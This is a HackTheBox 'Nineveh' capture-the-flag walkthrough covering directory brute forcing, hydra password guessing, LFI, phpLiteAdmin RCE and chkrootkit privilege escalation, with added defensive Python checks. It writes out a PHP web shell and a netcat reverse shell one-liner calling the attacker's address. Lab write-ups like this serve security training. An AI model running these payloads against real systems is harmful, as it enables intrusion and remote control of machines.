HACKTHEBOX NINEVEH WALKTHROUGH (OSCP STYLE)
Box Details:
OS: Linux
Exploitable service: vulnerable web application (LFI and public exploit), chkrootkit, knockd
Difficulty: Medium
Estimated time: 3 hours
Lessons learnt from the box: essential web directory bruteforcing, username enumeration via the web page, password brute forcing with hydra, weak passwords were used, steganography, vulnerable PHP web app (LFI and RCE), knockd port knocking, check for listening ports. A vulnerable application running on the server made privesc to root possible. Use pspy to check running processes/cron jobs on the server.
NMAP ENUM
Nmap Fast scan
Nmap Full scan
Nmap all ports
Web Enumeration 80 & 443
Port 80
Dir Burst
command = gobuster dir -u http://10.10.10.43 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 40
Second wordlist used: common.txt
gobuster revealed /department, /info.php and /server-status on port 80.
We enumerate all discovered directories further and find that /department has a login.php page, which we will test for default passwords.
Checking the page source of the login page for hints, we discover the possible usernames admin and amrois, plus more hints.
Trying a couple of passwords with each username, we notice the web page is vulnerable to username enumeration:
when admin is used, the error is "Invalid Password!";
when amrois or other usernames are used, it says "invalid username", which suggests admin is a valid username.
We will brute force this with hydra later on.
Port 443 enumeration
Visiting the webpage on https
We further directory-bruteforce with gobuster to check for hidden directories
and find /db, /secure_notes, /server-status and index.html, then enumerate them further.
/db appears to be a vulnerable phpLiteAdmin web application with a public exploit on the web (https://www.exploit-db.com/exploits/24044); it is vulnerable to remote code execution, but first I will need to be an authenticated user.
The exploit is self-explanatory: I will need to create a new database, rename its extension to .php, then input PHP commands. Yes, a PHP shell will do.
/secure_notes presents a nineveh.png which I suspect might be a steganograph, because it just looks creepy with its Egyptian hieroglyphs. I suspect there is hidden data inside and will investigate further.
I download the image with wget --no-check-certificate and use binwalk to check for hidden files.
There are hidden files in there;
they seem to be SSH keys (weird, because SSH isn't running on the server).
Since we can't do anything with the keys yet, we continue further enumeration.
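What binwalk is doing here, in its simplest form, is walking the PNG chunks to find IEND and then checking whatever bytes follow against known file signatures. As an added example, not from the original post or from binwalk itself, a Python version of that check run on a constructed 1x1 PNG with a fake PEM key appended; the signature table is a small assumed subset.

```python
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# Small illustrative signature table (an assumption, not binwalk's database).
SIGNATURES = {
    b"-----BEGIN RSA PRIVATE KEY-----": "PEM RSA private key",
    b"ssh-rsa ": "OpenSSH public key",
    b"PK\x03\x04": "ZIP archive",
    b"\x1f\x8b": "gzip data",
}

def png_end_offset(data):
    """Walk the PNG chunk list and return the offset just past IEND."""
    if not data.startswith(PNG_MAGIC):
        raise ValueError("not a PNG file")
    pos = len(PNG_MAGIC)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4            # length+type header, payload, CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("truncated PNG: no IEND chunk")

def find_appended(data):
    """Return (offset, size, label) for bytes trailing IEND, or None."""
    end = png_end_offset(data)
    tail = data[end:]
    if not tail:
        return None
    label = "unknown data"
    for magic, name in SIGNATURES.items():
        idx = tail.find(magic)
        if idx != -1:
            label = f"{name} at +{idx}"
            break
    return end, len(tail), label

def _chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

# Constructed 1x1 greyscale PNG standing in for nineveh.png, with a fake key
# appended after IEND the way binwalk would report it.
TINY_PNG = (PNG_MAGIC
            + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
            + _chunk(b"IDAT", zlib.compress(b"\x00\x00"))
            + _chunk(b"IEND", b""))
SAMPLE = TINY_PNG + b"\x00" * 16 + b"-----BEGIN RSA PRIVATE KEY-----\nCONSTRUCTED-NOT-A-REAL-KEY\n"
```

Run `find_appended(open("nineveh.png", "rb").read())` on a real file to get the offset to hand to `dd` or binwalk's extraction.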
Password brute forcing with hydra
hydra is installed by default on Kali.
We need to craft a hydra request; you can go through the man page for hydra.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -t 50
-l is the username
-P is the password wordlist
10.10.10.43 is the victim
http-post-form or https-post-form is the module hydra uses to submit the login request via POST
/db/index.php, the next colon-separated field, is the location of the login page on the server
password=^PASS^&remember=yes&login=Log+In&proc_login=true is the body of the POST request; hydra substitutes each wordlist entry for ^PASS^
Incorrect is the failure string hydra uses as a filter to tell a successful login apart from a failed one.
We will replicate the same for the port 80 directory.
Examine the request with the Firefox developer tools (Inspect Element, then the Network tab) to get the parameters of the POST request. Repeat the same for the port 80 login page.
password brute forcing with hydra
password for port 443 phpliteadmin page is password123
password for port 80 /department page is 1q2w3e4r5t
Be careful when crafting your hydra commands: a single mistake, like an upper-case letter in the web directory, would produce no results and you would waste a lot of time. This happened to me.
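The failure-string oracle described above also works in reverse for a defender: under a hydra run every failed login returns a page of the same size, and the one response that differs is the hit. As an added example (not from the original post), a small detector over constructed Apache-style log lines that flags POST bursts to /db/index.php and counts those size outliers; the log lines, thresholds and 10.10.14.11 as the attacker address are assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Apache combined-log style line; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec

def detect_bruteforce(log_text, threshold=10, window=10):
    """Flag (ip, path) pairs with >= threshold POSTs inside any `window` seconds.
    Returns [(ip, path, max_posts_in_window, outliers)]; outliers counts responses
    whose size differs from the dominant (failed-login) size."""
    posts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST":
            posts[(rec["ip"], rec["path"])].append(rec)
    alerts = []
    for (ip, path), recs in posts.items():
        recs.sort(key=lambda r: r["ts"])
        best, start = 0, 0
        for end in range(len(recs)):          # sliding window over timestamps
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            common_size = Counter(r["size"] for r in recs).most_common(1)[0][0]
            outliers = sum(1 for r in recs if r["size"] != common_size)
            alerts.append((ip, path, best, outliers))
    return alerts

# Constructed sample: twelve POSTs in twelve seconds to the phpLiteAdmin login,
# the last one with a different response size, plus one unrelated GET.
SAMPLE_LOG = "\n".join(
    f'10.10.14.11 - - [23/Jun/2017:14:00:{i:02d} -0500] "POST /db/index.php HTTP/1.1" '
    f'200 {2210 if i == 11 else 1532}'
    for i in range(12)
) + '\n10.10.10.2 - - [23/Jun/2017:14:00:05 -0500] "GET /index.html HTTP/1.1" 200 178'
```

`detect_bruteforce(SAMPLE_LOG)` reports the single source with 11 POSTs inside a 10-second window and one size outlier, which is the guess worth checking against the application's own login log.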
Logging into the port 80 page, we see it is a custom web app.
Further enumeration suggests the Notes page has a possible LFI vulnerability, which we will confirm.
There is also a note to check the secret folder we saw earlier, where we discovered SSH keys but SSH isn't running on the server (could this be a rabbit hole?).
Testing for LFI using Burp Suite took a long while but was eventually successful. When "filen/ninvehNotes.txt" was removed, an error was returned about which note was selected.
We discover amrois and root are the only users on the box.
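To see what the Notes page LFI comes down to, here is an added example (not code from the box or from the original post) contrasting the vulnerable path-building logic with a hardened version; NOTES_DIR and the `.txt` naming rule are assumptions.

```python
import os

# Assumed layout (not the box's real paths): notes live in one directory and
# the "notes" request parameter names a file inside it, e.g. ninevehNotes.txt.
NOTES_DIR = "/srv/department/files"

def vulnerable_path(requested):
    """Mirrors include($dir . $_GET['notes']) style logic: traversal
    sequences or an absolute path in `requested` escape NOTES_DIR."""
    return os.path.normpath(os.path.join(NOTES_DIR, requested))

def hardened_path(requested):
    """Resolve the request and refuse anything that is not a note file
    located directly inside NOTES_DIR."""
    if "\x00" in requested:                 # classic truncation trick
        raise ValueError("NUL byte in filename")
    name = os.path.basename(requested)      # drop any directory component
    if name in ("", ".", "..") or not name.endswith(".txt"):
        raise ValueError("not a note filename")
    base = os.path.realpath(NOTES_DIR)
    full = os.path.realpath(os.path.join(base, name))
    # belt and braces: even via symlinks the result must stay under base
    if os.path.commonpath([base, full]) != base:
        raise PermissionError("path escapes the notes directory")
    return full

def is_allowed(requested):
    """Boolean view of hardened_path for callers that just need yes/no."""
    try:
        hardened_path(requested)
        return True
    except (ValueError, PermissionError):
        return False

if __name__ == "__main__":
    for req in ("ninevehNotes.txt", "../../../../etc/passwd", "/etc/passwd"):
        print(f"{req!r}: vulnerable -> {vulnerable_path(req)}, hardened allows -> {is_allowed(req)}")
```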
Exploiting the phpLiteAdmin application
We log in with the discovered password and follow the steps in the public exploit: https://www.exploit-db.com/exploits/24044
Note the location of the file: Database '/var/tmp/test' has been renamed to '/var/tmp/test.php'.
I input this as my shell: <?php echo system($_REQUEST['cmd']);?>
I get an error which seems to be caused by the quotes on 'cmd'; I will replace them with "cmd".
And this works:
we've got remote code execution, and can now run a reverse shell command.
Reverse shell: &cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.11 443 >/tmp/f
Set up a netcat listener and we get a shell.
Time to privesc
www-data is a limited user and won't have many permissions, so I'll use linpeas.sh.
Use a Python HTTP server and wget to transfer files from the attacking machine to the victim.
Make linpeas.sh executable and run it.
Found some interesting paths.
Found SSH listening on port 22, strange!
Reading amrois's mail, we discover that this could be a case of port knocking.
Port knocking closes and opens ports, just like a firewall, but you have to hit a sequence of ports before your destination port is opened. Read more here: https://www.howtogeek.com/442733/how-to-use-port-knocking-on-linux-and-why-you-shouldnt/
From root@nineveh.htb Fri Jun 23 14:04:19 2017
Return-Path: <root@nineveh.htb>
X-Original-To: amrois
Delivered-To: amrois@nineveh.htb
Received: by nineveh.htb (Postfix, from userid 1000)
id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
To: amrois@nineveh.htb
From: root@nineveh.htb
Subject: Another Important note!
Message-Id: <20170623190419.D289B2E3587@nineveh.htb>
Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
Amrois! please knock the door next time! 571 290 911
We have to knock on ports 571 290 911 to open port 80.
We confirm the ports to knock by reading the /etc/knockd.conf file.
The ports have to be knocked in the correct sequence.
We do this using knock on Kali, installed with apt install knockd.
We use nmap to confirm the state of the port and verify it is now open.
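An illustrative knockd.conf using the sequence from the mail, added here as an example and not the file read from the box. It assumes the daemon guards SSH on port 22 (the port linpeas showed listening) and uses iptables in the open and close commands.

```ini
[options]
    logfile = /var/log/knockd.log

[openSSH]
    sequence      = 571,290,911
    seq_timeout   = 5
    tcpflags      = syn
    start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT

[closeSSH]
    sequence      = 911,290,571
    seq_timeout   = 5
    tcpflags      = syn
    start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
```

The sequence is a shared secret, so anyone who reads that mail or captures the knocks on the wire can open the port; knocking only hides SSH, it does not replace key-based authentication on it.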
Privesc to amrois
Remember we had SSH keys from the steganograph? Yes, we will use the SSH key to gain access.
We can now read the user.txt file.
Privesc to root.
We run linpeas.sh as amrois to see what we can find.
We find /report as an unexpected folder in the root directory
and will investigate this further.
We go to the directory and discover newly created files within the space of 1 minute; looking at the reports we see they relate to scans for rootkits, worms, viruses and anything malicious.
We have to investigate this further using pspy64 to watch in real time which processes run on the server as they execute. Download the pspy build compatible with the server architecture from https://github.com/DominicBreuker/pspy
Use uname -a to check your victim's architecture,
and transfer it to the victim using wget.
Now use pspy to check running processes. Monitor for about 3 minutes.
The culprit happens to be /usr/bin/chkrootkit running as a cron job and creating those reports; there is also a cron job for the amrois user that deletes the reports.
We google chkrootkit to see what we can find.
We couldn't verify the version of chkrootkit, so we will try our luck with this exploit: https://www.exploit-db.com/exploits/33899
It's not a script, so we will follow the steps in the PoC.
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not mounted noexec, obviously)
- Run chkrootkit (as uid 0)
Result: The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file. If an attacker knows you are periodically running chkrootkit (like in cron.daily) and has write access to /tmp (not mounted noexec), he may easily take advantage of this.
I've followed the steps in the exploit PoC; now I wait.
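From the defender's side, the two conditions the advisory names (a non-root-owned executable /tmp/update, and /tmp not mounted noexec) are easy to audit. Added example, not from the original post or from chkrootkit: a pure classifier on lstat mode/uid values, a live wrapper around it, and a /proc/mounts parser run on a constructed sample.

```python
import stat
from pathlib import Path

def classify_update_file(mode, uid):
    """Pure check on lstat-style (st_mode, st_uid) of /tmp/update: True when it
    matches the condition the chkrootkit 0.49 advisory describes."""
    if stat.S_ISLNK(mode):
        return True, "update is a symlink and may point anywhere"
    executable = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
    if executable and uid != 0:
        return True, f"executable update owned by non-root uid {uid}"
    if executable:
        return False, "executable update owned by root (still worth a look)"
    return False, "update exists but is not executable"

def audit_update_hook(tmp_dir="/tmp"):
    """Live check of <tmp_dir>/update on this host."""
    target = Path(tmp_dir) / "update"
    try:
        st = target.lstat()
    except FileNotFoundError:
        return False, "no update file present"
    return classify_update_file(st.st_mode, st.st_uid)

def tmp_is_noexec(mounts_text, mount_point="/tmp"):
    """Parse /proc/mounts text; True when mount_point carries noexec."""
    for line in mounts_text.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[1] == mount_point:
            return "noexec" in parts[3].split(",")
    return False   # no dedicated mount: inherits the root filesystem

# Constructed /proc/mounts sample for an offline run.
SAMPLE_MOUNTS = ("/dev/sda1 / ext4 rw,relatime 0 0\n"
                 "tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0\n")

if __name__ == "__main__":
    print(audit_update_hook())
    with open("/proc/mounts") as fh:
        print("/tmp noexec:", tmp_is_noexec(fh.read()))
```

Either a risky verdict from `audit_update_hook` or a False from `tmp_is_noexec` on a host that runs chkrootkit from cron is the finding to act on; upgrading chkrootkit past 0.49 removes the root cause.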